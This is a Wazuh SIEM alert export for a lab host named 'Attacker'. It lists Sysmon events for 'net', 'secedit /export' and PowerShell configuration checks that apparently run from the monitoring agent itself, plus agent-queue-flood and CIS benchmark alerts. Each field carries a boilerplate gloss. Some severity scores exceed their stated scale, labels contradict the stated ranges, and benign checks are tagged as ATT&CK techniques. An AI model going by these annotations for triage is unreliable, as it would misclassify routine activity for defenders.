data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:44.314 ProcessGuid: {94294ddc-be64-680a-340c-000000000e00} ProcessId: 14436 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be64-680a-320c-000000000e00} ParentProcessId: 10704 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:44.314
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be64-680a-340c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14436
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be64-680a-320c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10704
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:43:00.702+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:00.702+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534580.2332848
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:48.2996900Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291773
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:42:48.298 ProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00} ProcessId: 8604 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1 CreationUtcTime: 2025-04-24 22:42:48.298 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:48.298
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be67-680a-3a0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8604
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:42:48.298
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe

🧠 What happened? C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:43:04.484+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:04.484+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92066
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534584.2335549
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:49.7011971Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  292055
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:49.694 ProcessGuid: {94294ddc-be69-680a-3c0c-000000000e00} ProcessId: 6028 Image: C:\Windows\SysWOW64\SecEdit.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Windows Security Configuration Editor Command Tool Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: SeCEdit CommandLine: "C:\WINDOWS\system32\SecEdit.exe" /export /cfg C:\WINDOWS\TEMP/secexport.cfg CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A ParentProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00} ParentProcessId: 8604 ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:49.694
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be69-680a-3c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\SecEdit.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Security Configuration Editor Command Tool
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  SeCEdit
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\system32\\SecEdit.exe\" /export /cfg C:\\WINDOWS\\TEMP/secexport.cfg
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be67-680a-3a0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8604
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  powershell \"$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\\"LSAAnonymousNameLookup\\\").ToString().Split(\\\"=\\\")[1].Trim()\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is 90% full.

🧠 What happened? Agent event queue is 90% full.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:13.995+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:13.995+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is 90% full.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  202
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534593.2341890
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: '90%'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  90%
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is full. Events may be lost.

🧠 What happened? Agent event queue is full. Events may be lost.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:19.418+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:19.418+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is full. Events may be lost.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  203
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534599.2342118
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'full'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  full
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is flooded. Check the agent configuration.

🧠 What happened? Agent event queue is flooded. Check the agent configuration.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:35.002+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:35.002+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is flooded. Check the agent configuration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  204
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534615.2342364
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'flooded'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  flooded
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is full. Events may be lost.

🧠 What happened? Agent event queue is full. Events may be lost.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:39.887+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:39.887+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is full. Events may be lost.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  203
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534619.2342637
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'full'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  full
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is flooded. Check the agent configuration.

🧠 What happened? Agent event queue is flooded. Check the agent configuration.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:54.634+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:54.634+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is flooded. Check the agent configuration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  204
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534634.2342883
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'flooded'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  flooded
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:05.106+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:05.106+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

